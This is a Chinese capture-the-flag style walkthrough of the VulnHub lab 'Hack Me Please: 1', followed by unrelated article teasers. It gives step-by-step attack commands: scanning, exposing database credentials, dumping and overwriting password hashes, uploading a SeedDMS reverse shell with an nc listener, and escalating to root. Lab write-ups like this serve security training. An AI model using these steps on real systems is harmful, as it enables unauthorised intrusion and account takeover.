HACK ME PLEASE: 1

news/2024/11/17 13:44:42/

文章目录

      • HACK ME PLEASE: 1实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、访问网站
            • 2、端口扫描
            • 2、扫描目录
            • 3、访问网站
            • 4、访问网站
            • 5、扫描目录
            • 6、访问网站
            • 7、登录MySQL数据库
            • 8、查看数据表
            • 9、查看users表的内容
            • 10、查看tblUsers表内容
            • 11、解密
            • 12、加密
            • 13、修改密码
            • 14、查询漏洞
            • 15、查看源码
          • 三、Web漏洞工具
            • 1、创建shell
            • 2、上传shell
            • 3、访问shell路径
            • 4、监听
          • 四、提权
            • 1、美化终端
            • 2、切换用户
            • 3、切换用户

HACK ME PLEASE: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hack-me-please-1,731/

设备名称IP地址
靶机:HACK ME PLEASE: 1192.168.0.108
攻击机:kali192.168.0.112
二、信息收集
1、访问网站
http://192.168.0.108/

在这里插入图片描述

2、端口扫描
kali@kali:~$ nmap -A 192.168.0.108
# 开放WEB:80端口、mysql:3306端口

在这里插入图片描述

2、扫描目录
kali@kali:~$ sudo dirsearch -u “http://192.168.0.108/

在这里插入图片描述

kali@kali:~$ sudo dirsearch -h “http://192.168.0.108/js”

在这里插入图片描述

3、访问网站
http://192.168.108/js/main.js
# 发现安装路径:/seeddms15x/seeddms-5.1.22/

在这里插入图片描述

4、访问网站
http://192.168.0.108/seeddms15x/seeddms-5.1.22/
# 发现这是个登录界面

在这里插入图片描述

5、扫描目录
kali@kali:~$ sudo dirsearch -h “http://192.168.0.108/seeddms15x/seeddms-5.1.22/

在这里插入图片描述

kali@kali:~$ sudo dirsearch -h “http://192.168.0.108/seeddms15x/

在这里插入图片描述

kali@kali~$ sudo dirsearch -h “http://192.168.0.108/seeddms15x/conf”

在这里插入图片描述

6、访问网站
http://192.168.0.108/seeddms51x/conf/settings.xml
# 发现数据库类型:MySQL类型,数据库名:seeddms,用户名:seeddms,密码:seeddms

在这里插入图片描述

7、登录MySQL数据库
kali@kali~$: mysql -h 192.168.0.108 -D seeddms -u seeddms -p seeddms

在这里插入图片描述

8、查看数据表
show tables;

在这里插入图片描述

9、查看users表的内容
select * from users;
# 发现账号:saket,密码:Saket@#$1337

在这里插入图片描述

10、查看tblUsers表内容
select * from tblUsesrs;
# 发现账号:admin,MD5加密密码:f9ef2c539bad8a6d2f3432b6d49ab51a

在这里插入图片描述

11、解密

网址:https://www.cmd5.com/

# 没有解密成功,那就修改密码

在这里插入图片描述

12、加密

网址:https://www.cmd5.com/hash.aspx?s=123456

在这里插入图片描述

13、修改密码
update tblUsers set pwd=’e10adc3949ba59abbe56e057f20f883e’ where login=’admin’;

在这里插入图片描述

14、查询漏洞
kali@kali:~$ searchsploit seeddms

在这里插入图片描述

15、查看源码
kali@kali:~$ cat /usr/share/exploitdb/exploits/php/webapps/47022.txt

在这里插入图片描述

三、Web漏洞工具
1、创建shell

网址:https://www.revshells.com/
在这里插入图片描述

2、上传shell

在这里插入图片描述

3、访问shell路径
# 从之前源码中获得路径的格式:example.com/data/1048576/"document_id"/1.php
http://192.168.0.108/seeddms15x/data/1048576/4/1.php

在这里插入图片描述

在这里插入图片描述

4、监听
kali@kali:~$ nc -lvnp 9001

在这里插入图片描述

四、提权
1、美化终端
$ python3 -c "import pty;pty.spawn('/bin/bash')"
2、切换用户
www-data@ubuntu:/home$ su saket

在这里插入图片描述

3、切换用户
saket@ubuntu:/home$ sudo su -l

在这里插入图片描述


http://www.ppmy.cn/news/76471.html

相关文章

ChatGPT国内免费访问

背景 ChatGPT作为一种基于人工智能技术的自然语言处理工具,近期的热度直接沸腾🌋。 作为一个程序员,我也忍不住做了一个基于ChatGPT的网站,免费!免梯子!!国内可直接对话ChatGPT,也…

【医学图像】图像分割系列.1

医学图像分割是一个比较有应用意义的方向,本文简单介绍三篇关于医学图像分割的论文: UNeXt(MICCAI2022),PHTrans(MICCAI2022),DA-Net(MICCAI2022)。 目录 …

到底什么是CIDR(无类域间路由)?做网络的一定得懂这个术语!

CIDR(无类域间路由)是一种用于对互联网IP地址进行聚合和分配的技术。它通过改变IP地址的分配方式,有效地解决了IPv4地址空间不足的问题。 本文将详细介绍CIDR的原理、使用方法以及它对互联网的影响,还会针对CIDR出三道例题&#x…

软件测试的7个级别,做到3级已经超越80%测试人!

有人说:软件测试就是最low的点点点工作。 有人说:测试工作职位薪水到一定程度只能原地踏步无法提升 也有人说:测试行业相对于开发来说技术性很低,容易被取代。 这其实是对测试行业最大的误解。测试可深可浅,可窄可广…

《汇编语言》- 读书笔记 - 第4章-第一个程序

《汇编语言》- 读书笔记 - 第4章-第一个程序 4.1 一个源程序从写出到执行的过程4.2 源程序程序 4.11. 伪指令1.1 segment ends 声明段1.2 end 结束标记1.3 assume 关联 2. 源程序中的“程序”3. 标号4. 程序的结构5. 程序返回6. 语法错误和逻辑错误 4.3 编辑源程序4.4 编译4.5 …

3年前的我废人一个,庆幸当时入了软件测试这行

为什么会学习软件测试? 已经28岁了,算一下快过去3年了,刚毕业那会工作了一年,因为自己当时很迷茫(觉得自己挺废的),所以就没去工作就一直在家,家里固定每个月给点生活费&#xff0c…

Zookeeper、Nacos、Dubbo、Kafka之间的关系

1.Zookeeper Zookeeper 是 Apache Hadoop 的子项目,是一个树型的目录服务,支持变更推送,适合作为 Dubbo 服务的注册中心,工业强度较高。 Zookeeper的功能主要是它的树形节点来实现的。当有数据变化的时候或者节点过期的时候&…

耗时162天,从华为外包5k转岗正式员工15k,经历的心酸只有自己知道····

一提及外包测试,大部分人的第一印象就是:工作强度大,技术含量低,没有归属感! 本人毕业于某普通二本院校非计算机专业,跨专业入行测试,至今有近 5年工作经验。 第一份测试工作是在华为做了两年外…